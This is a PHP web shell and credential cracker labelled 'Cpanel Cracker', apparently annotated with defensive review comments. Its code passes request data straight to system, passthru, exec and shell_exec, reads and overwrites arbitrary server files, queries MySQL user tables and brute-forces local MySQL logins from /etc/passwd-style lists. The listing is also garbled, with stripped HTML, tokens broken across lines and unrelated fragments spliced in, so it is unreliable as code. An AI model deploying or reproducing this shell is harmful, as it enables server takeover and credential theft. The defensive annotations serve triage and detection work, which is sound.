/*
Cpanel Cracker By Hacking Sec-------------> edited by :: H4ntu_Cr3w
*/
// Defensive note: before doing anything else the script removes PHP's execution
// time limit and turns error reporting off, and it silences both calls with @.
// Long-running requests therefore neither time out nor report PHP errors.
// Together with the request-driven system()/fopen() calls later in the file,
// this opening is a useful triage signal when reviewing unexpected PHP files.
// NOTE(review): the echoed markup is empty in this listing; the HTML appears to
// have been stripped when the page was extracted.
@set_time_limit(0);
@error_reporting(0);
echo '
';
// Form-field helper: returns a string that carries optional size=, value="..."
// and checked attributes. Later code calls it as in('hidden', <name>, 0, $_POST[...]).
// $value is concatenated into value="..." with no escaping, so request data is
// reflected verbatim into the page.
// NOTE(review): this listing is damaged. The opening of the $ret string and the
// condition guarding the size= branch are missing (presumably stripped with the
// HTML), so the body below is not complete as printed.
function in($type,$name,$size,$value,$checked=0)
{
$ret = "
{
$ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">
"; }
// Database helper built on the legacy PHP driver functions.
// connect() switches on $this->db ('MySQL', 'MSSQL', 'PostgreSQL', 'Oracle'):
//   - fills in a default port when $this->port is empty (3306 / 1433 / 5432);
//   - returns 0 immediately when the driver function does not exist;
//   - returns 1 when a connection is obtained;
//   - otherwise stores a message in $this->error and falls through to return 0.
// Every driver call is @-silenced, so failures produce no PHP warnings.
// Defensive note: mysql_connect() and mssql_connect() no longer exist in PHP 7
// and later, so on a current runtime the function_exists() guards make those two
// branches return 0.
// NOTE(review): the listing is wrapped mid-token at a fixed column and is
// truncated partway through the class; see the notes further down.
class my_sql
{
var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $b
ase = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $c
olumns; var $num_rows; var $num_fields; var $dump; function connect()
{
switch($this->db)
{
case 'MySQL': if(empty($this->port))
{
$this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_conn
ect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->
connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break
; case 'MSSQL': if(empty($this->port))
{
$this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_conn
ect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection)
return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if
(empty($this->port))
{
$this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' pa
ssword='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_conn
ect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->co
nnection)) return 1; $this->error = @pg_last_error($this->connection); break; ca
se 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @oci
logon($this->user, $this->pass, $this->base); if(is_resource($this->connection))
return 1; $error = @ocierror(); $this->error=$error['message']; break; }
return 0; }
// select_db(): selects $this->base on the open connection and returns 1 on
// success. Only the MySQL case and the start of the MSSQL case survive in this
// listing; the rest of the method is missing.
function select_db()
{
switch($this->db)
{
case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $th
is->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_
select_db($this->base,$this->connection)) return 1; $this->error = "Can't select
"; }
// NOTE(review): from here to the closing braces the text belongs to code whose
// beginning is not in this listing (it refers to $sql and to a case '2'), so it
// should not be read as part of select_db().
break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); ech
o "
affected rows : ".$ar."
"; break; }
}
}
}
}
echo "
Cpanel Cracker by C0die r00t";
echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['d
b_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','
mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db
_query');
echo "
"; echo "Base: base."\">
"; echo "".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nS
ELECT * FROM user;"))."
"; echo ""; echo "
[ BACK ]
"; die(); }
// Command-execution handler (web-shell behaviour).
// Although it declares two parameters and re-binds them with `global`, the body
// reads the request directly: $_POST['att'] selects one of system / passthru /
// exec / shell_exec, and $_POST['ccmmdd2'] is passed to that function unchanged.
// No authentication, allow-list or escaping is visible in this listing.
// Defensive notes:
//   - Treat any PHP file that passes request data to these four functions as a
//     web shell.
//   - Listing the four functions in disable_functions blocks this path; the
//     script prints that setting itself further down.
//   - The web-server account spawning shell processes is a reliable detection
//     point.
// NOTE(review): the HTML echoed around each branch is missing from this listing,
// so the quote pairing below cannot be trusted as printed.
function ccmmdd($ccmmdd2,$att)
{
global $ccmmdd2,$att;
echo '
';
if($_POST['att']==null)
{
echo '
}else{
echo "
system';
$_POST[att]
system
";
}
echo '
passthru
exec
shell_exec
';
if($_POST[att]=='system')
{
echo '
';
system($_POST['ccmmdd2']);
';
echo '
}
if($_POST[att]=='passthru')
{
echo '
';
passthru($_POST['ccmmdd2']);
';
echo '
}
if($_POST[att]=='exec')
{
echo '
';
exec($_POST['ccmmdd2'],$res);
echo $res = join("\n",$res);
';
echo '
}
if($_POST[att]=='shell_exec')
{
echo '
echo
echo '
';
shell_exec($_POST['ccmmdd2']);
';
}
echo '
';
exit;
}
// File-overwrite handler (page=edit): converts CRLF to LF in $_POST['code'],
// removes every backslash from it, then writes the result to $pathclass, which
// is opened in 'w' mode and therefore truncated first.
// The results of fopen/fwrite are not checked, and no authentication or path
// restriction is visible.
// NOTE(review): $pathclass is not assigned in this branch; presumably it arrives
// with the request in the original page -- confirm against a complete copy.
// Defensive note: writes to files under the document root by the web-server
// account are what file-integrity monitoring and read-only deployments are
// meant to catch.
if($_POST['page']=='edit')
{
$code=@str_replace("\r\n","\n",$_POST['code']);
$code=@str_replace('\\','',$code);
$fp = fopen($pathclass, 'w');
fwrite($fp,"$code");
fclose($fp);
echo "
OK Edit
BACK";
exit;
}
// File-read handler (page=show): opens the path given in $_POST['pathclass'],
// reads filesize() bytes and prints the content after htmlspecialchars().
// The path is used as supplied. Nothing in this branch limits which files can be
// read, so only the web-server account's permissions and settings such as
// open_basedir constrain it.
if($_POST['page']=='show')
{
$pathclass =$_POST['pathclass'];
echo '
';
$sahacker = fopen($pathclass, "rb");
echo '
'.$pathclass.'
';
$code = fread($sahacker, filesize($pathclass));
echo $code =htmlspecialchars($code);
echo '
';
fclose($sahacker);
echo '
';
exit;
}
// Dispatch for page=ccmmdd: hands control to the command-execution handler.
// $ccmmdd2 and $att are not assigned in the visible code before this call; the
// handler reads $_POST itself.
if($_POST['page']=='ccmmdd')
{
echo ccmmdd($ccmmdd2,$att);
exit;
}
// Credential-guessing handler (page=find).
// Builds a username list from $_POST['usernames']: one name per line for type
// 'simple', or the first colon-separated field of each line for type 'passwd'
// (the /etc/passwd layout). The password list comes from $_POST['passwords'].
// It then calls mysql_connect('localhost', $user, $pass), printing each pair
// that connects and counting the hits in $ok.
// NOTE(review): the inner loop header is incomplete in this listing.
// Defensive notes:
//   - Only local MySQL logins are tested, so a reported hit means a database
//     account accepted the guessed password. The "Cpanel" wording in the output
//     presumably assumes the same password is reused for the hosting account.
//   - This activity appears as a burst of failed MySQL authentications from
//     localhost across many account names; alerting on that pattern and on
//     connection-error thresholds is the matching control.
//   - mysql_connect() does not exist in PHP 7 and later.
if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
if($_POST['type'] == 'passwd'){
$e = explode("\n",$_POST['usernames']);
foreach($e as $value){
$k = explode(":",$value);
$username .= $k['0']." ";
}
}elseif($_POST['type'] == 'simple'){
$username = str_replace("\n",' ',$_POST['usernames']);
}
$a1 = explode(" ",$username);
$a2 = explode("\n",$_POST['passwords']);
$id2 = count($a2);
$ok = 0;
foreach($a1 as $user )
{
if($user !== '')
{
$user=trim($user);
for($i=0;$i
{
$pass = trim($a2[$i]);
if(@mysql_connect('localhost',$user,$pass))
{
echo "Hacking Sec~ user is ($user) Password is ($pass)
";
$ok++;
}
}
}
}
echo "
You Found $ok Cpanel (Hacking Sec)";
echo "
BACK";
exit;
}
}
?>
User :
Pass :
Type :
Simple :
/etc/passwd :
CMD MYSQL
user
pass
database
cmd ~
SHOW DATABASES;
SHOW TABLES user_vb ;
SELECT * FROM user;
SELECT version();
SELECT user();
CMD
system - passthru - exec - shell_exec
cmd ~
if($_POST['att']==null)
{
echo '
}else{
echo "
system';
$_POST[att]
system
";
}
?>
passthru
exec
shell_exec
Show
File And Edit
Path ~
Info
Security
Safe Mode
// Reports the safe_mode ini flag as ON or OFF.
// Defensive note: safe_mode was removed in PHP 5.4. On a current runtime
// ini_get() returns false for it, so this prints OFF whatever other hardening
// is in place.
$safe_mode = ini_get('safe_mode');
if($safe_mode=='1')
{
echo 'ON';
}else{
echo 'OFF';
}
?>
Function
// Prints the disable_functions ini value, or a fixed message when it is empty.
// Defensive note: this setting decides whether the system / passthru / exec /
// shell_exec calls earlier in the file can run at all, which is why the script
// reports it to its operator.
if(''==($func=@ini_get('disable_functions')))
{
echo "No Security for Function";
}else{
echo "$func";
}
?>
if ($_GET['user'] )
system('ls /var/mail');
for($uid=0;$uid
}
?>